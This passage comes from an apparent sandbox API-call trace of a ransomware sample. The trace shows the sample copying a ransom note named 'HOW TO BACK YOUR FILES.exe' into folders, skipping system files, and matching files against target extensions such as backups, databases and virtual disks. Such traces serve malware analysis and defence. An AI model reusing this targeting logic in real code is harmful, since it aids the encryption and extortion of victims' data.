nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0075.652] CloseHandle (hObject=0x120) returned 1 [0075.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0075.652] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.652] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.652] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.652] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.653] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0075.653] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.653] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.653] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0075.653] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0075.653] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0075.653] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c198fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0075.653] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0075.653] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0075.653] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0075.653] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0075.653] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0075.653] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0075.653] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0075.653] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0075.653] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0075.653] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0075.653] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0075.653] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0075.653] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0075.653] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0075.653] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0075.653] lstrlenW (lpString="packages") returned 8 [0075.653] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*") returned 84 [0075.653] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="packages" | out: lpString1="packages") returned="packages" [0075.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2620 [0075.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x31efc8 [0075.653] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2628 | out: ListHead=0x2e7710, ListEntry=0x2d2628) returned 0x2d2528 [0075.653] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0075.653] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0075.653] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2628 [0075.653] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" [0075.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0075.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0075.654] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned 91 [0075.654] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" [0075.654] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.654] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0075.654] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0075.654] GetLastError () returned 0x0 [0075.655] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0075.655] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0075.655] CloseHandle (hObject=0x120) returned 1 [0075.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0075.655] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.655] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.655] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.655] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.655] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0075.655] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.655] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.655] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0075.655] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0075.655] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0075.655] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c198fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0075.655] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0075.655] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0075.655] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0075.655] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="aoldtz.exe") returned 1 [0075.655] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0075.655] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0075.655] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="windows") returned -1 [0075.655] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="bootmgr") returned 1 [0075.655] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="temp") returned 1 [0075.655] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="pagefile.sys") returned 1 [0075.655] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="boot") returned 1 [0075.655] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="ids.txt") returned 1 [0075.656] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="ntuser.dat") returned 1 [0075.656] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="perflogs") returned 1 [0075.656] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="MSBuild") returned 1 [0075.656] lstrlenW (lpString="vcRuntimeMinimum_amd64") returned 22 [0075.656] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*") returned 93 [0075.656] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="vcRuntimeMinimum_amd64" | out: lpString1="vcRuntimeMinimum_amd64") returned="vcRuntimeMinimum_amd64" [0075.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2620 [0075.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe6) returned 0x2c8eb8 [0075.656] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2628 | out: ListHead=0x2e7710, ListEntry=0x2d2628) returned 0x2d2528 [0075.656] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0075.656] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0075.656] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2628 [0075.656] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" [0075.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0075.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0075.656] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned 114 [0075.656] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64" [0075.656] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.656] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0075.657] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0075.657] GetLastError () returned 0x0 [0075.657] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0075.657] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0075.657] CloseHandle (hObject=0x120) returned 1 [0075.657] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0075.657] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.657] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0075.657] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.657] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.657] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0075.657] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c1bf120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c1bf120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.657] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.657] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0075.657] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0075.657] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0075.657] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b69ee00, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7b69ee00, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7b69ee00, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0xfc90a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0075.657] lstrcmpiW (lpString1="cab1.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.657] lstrcmpiW (lpString1="cab1.cab", lpString2="aoldtz.exe") returned 1 [0075.657] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0075.657] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2="bootmgr") returned 1 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2="temp") returned -1 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2="pagefile.sys") returned -1 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2="boot") returned 1 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2="ids.txt") returned -1 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2="perflogs") returned -1 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2="MSBuild") returned -1 [0075.658] lstrlenW (lpString="cab1.cab") returned 8 [0075.658] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*") returned 116 [0075.658] lstrcpyW (in: lpString1=0x2cce4e6, lpString2="cab1.cab" | out: lpString1="cab1.cab") returned="cab1.cab" [0075.658] lstrlenW (lpString="cab1.cab") returned 8 [0075.658] lstrlenW (lpString="Ares865") returned 7 [0075.658] lstrcmpiW (lpString1="ab1.cab", lpString2="Ares865") returned -1 [0075.658] lstrlenW (lpString=".dll") returned 4 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2=".dll") returned 1 [0075.658] lstrlenW (lpString=".lnk") returned 4 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2=".lnk") returned 1 [0075.658] lstrlenW (lpString=".ini") returned 4 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2=".ini") returned 1 [0075.658] lstrlenW (lpString=".sys") returned 4 [0075.658] lstrcmpiW (lpString1="cab1.cab", lpString2=".sys") returned 1 [0075.658] lstrlenW (lpString="cab1.cab") returned 8 [0075.658] lstrlenW (lpString="bak") returned 3 [0075.658] lstrcmpiW (lpString1="cab", lpString2="bak") returned 1 [0075.658] lstrlenW (lpString="ba_") returned 3 [0075.658] lstrcmpiW (lpString1="cab", lpString2="ba_") returned 1 [0075.658] lstrlenW (lpString="dbb") returned 3 [0075.658] lstrcmpiW (lpString1="cab", lpString2="dbb") returned -1 [0075.658] lstrlenW (lpString="vmdk") returned 4 [0075.658] lstrcmpiW (lpString1=".cab", lpString2="vmdk") returned -1 [0075.658] lstrlenW (lpString="rar") returned 3 [0075.658] lstrcmpiW (lpString1="cab", lpString2="rar") returned -1 [0075.658] lstrlenW (lpString="zip") returned 3 [0075.658] lstrcmpiW (lpString1="cab", lpString2="zip") returned -1 [0075.658] lstrlenW (lpString="tgz") returned 3 [0075.658] lstrcmpiW (lpString1="cab", lpString2="tgz") returned -1 [0075.659] lstrlenW (lpString="vbox") returned 4 [0075.659] lstrcmpiW (lpString1=".cab", lpString2="vbox") returned -1 [0075.659] lstrlenW (lpString="vdi") returned 3 [0075.659] lstrcmpiW (lpString1="cab", lpString2="vdi") returned -1 [0075.659] lstrlenW (lpString="vhd") returned 3 [0075.659] lstrcmpiW (lpString1="cab", lpString2="vhd") returned -1 [0075.659] lstrlenW (lpString="vhdx") returned 4 [0075.659] lstrcmpiW (lpString1=".cab", lpString2="vhdx") returned -1 [0075.659] lstrlenW (lpString="avhd") returned 4 [0075.659] lstrcmpiW (lpString1=".cab", lpString2="avhd") returned -1 [0075.659] lstrlenW (lpString="db") returned 2 [0075.659] lstrcmpiW (lpString1="ab", lpString2="db") returned -1 [0075.659] lstrlenW (lpString="db2") returned 3 [0075.659] lstrcmpiW (lpString1="cab", lpString2="db2") returned -1 [0075.659] lstrlenW (lpString="db3") returned 3 [0075.659] lstrcmpiW (lpString1="cab", lpString2="db3") returned -1 [0075.659] lstrlenW (lpString="dbf") returned 3 [0075.659] lstrcmpiW (lpString1="cab", lpString2="dbf") returned -1 [0075.659] lstrlenW (lpString="mdf") returned 3 [0075.659] lstrcmpiW (lpString1="cab", lpString2="mdf") returned -1 [0075.659] lstrlenW (lpString="mdb") returned 3 [0075.659] lstrcmpiW (lpString1="cab", lpString2="mdb") returned -1 [0075.659] lstrlenW (lpString="sql") returned 3 [0075.659] lstrcmpiW (lpString1="cab", lpString2="sql") returned -1 [0075.659] lstrlenW (lpString="sqlite") returned 6 [0075.659] lstrcmpiW (lpString1="b1.cab", lpString2="sqlite") returned -1 [0075.659] lstrlenW (lpString="sqlite3") returned 7 [0075.659] lstrcmpiW (lpString1="ab1.cab", lpString2="sqlite3") returned -1 [0075.659] lstrlenW (lpString="sqlitedb") returned 8 [0075.659] lstrlenW (lpString="xml") returned 3 [0075.659] lstrcmpiW (lpString1="cab", lpString2="xml") returned -1 [0075.659] lstrlenW (lpString="$er") returned 3 [0075.659] lstrcmpiW (lpString1="cab", lpString2="$er") returned 1 [0075.659] lstrlenW (lpString="4dd") returned 3 [0075.659] lstrcmpiW (lpString1="cab", lpString2="4dd") returned 1 [0075.659] lstrlenW (lpString="4dl") returned 3 [0075.659] lstrcmpiW (lpString1="cab", lpString2="4dl") returned 1 [0075.659] lstrlenW (lpString="^^^") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="^^^") returned 1 [0075.660] lstrlenW (lpString="abs") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="abs") returned 1 [0075.660] lstrlenW (lpString="abx") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="abx") returned 1 [0075.660] lstrlenW (lpString="accdb") returned 5 [0075.660] lstrcmpiW (lpString1="1.cab", lpString2="accdb") returned -1 [0075.660] lstrlenW (lpString="accdc") returned 5 [0075.660] lstrcmpiW (lpString1="1.cab", lpString2="accdc") returned -1 [0075.660] lstrlenW (lpString="accde") returned 5 [0075.660] lstrcmpiW (lpString1="1.cab", lpString2="accde") returned -1 [0075.660] lstrlenW (lpString="accdr") returned 5 [0075.660] lstrcmpiW (lpString1="1.cab", lpString2="accdr") returned -1 [0075.660] lstrlenW (lpString="accdt") returned 5 [0075.660] lstrcmpiW (lpString1="1.cab", lpString2="accdt") returned -1 [0075.660] lstrlenW (lpString="accdw") returned 5 [0075.660] lstrcmpiW (lpString1="1.cab", lpString2="accdw") returned -1 [0075.660] lstrlenW (lpString="accft") returned 5 [0075.660] lstrcmpiW (lpString1="1.cab", lpString2="accft") returned -1 [0075.660] lstrlenW (lpString="adb") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0075.660] lstrlenW (lpString="adb") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0075.660] lstrlenW (lpString="ade") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="ade") returned 1 [0075.660] lstrlenW (lpString="adf") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="adf") returned 1 [0075.660] lstrlenW (lpString="adn") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="adn") returned 1 [0075.660] lstrlenW (lpString="adp") returned 3 [0075.660] lstrcmpiW (lpString1="cab", lpString2="adp") returned 1 [0075.660] 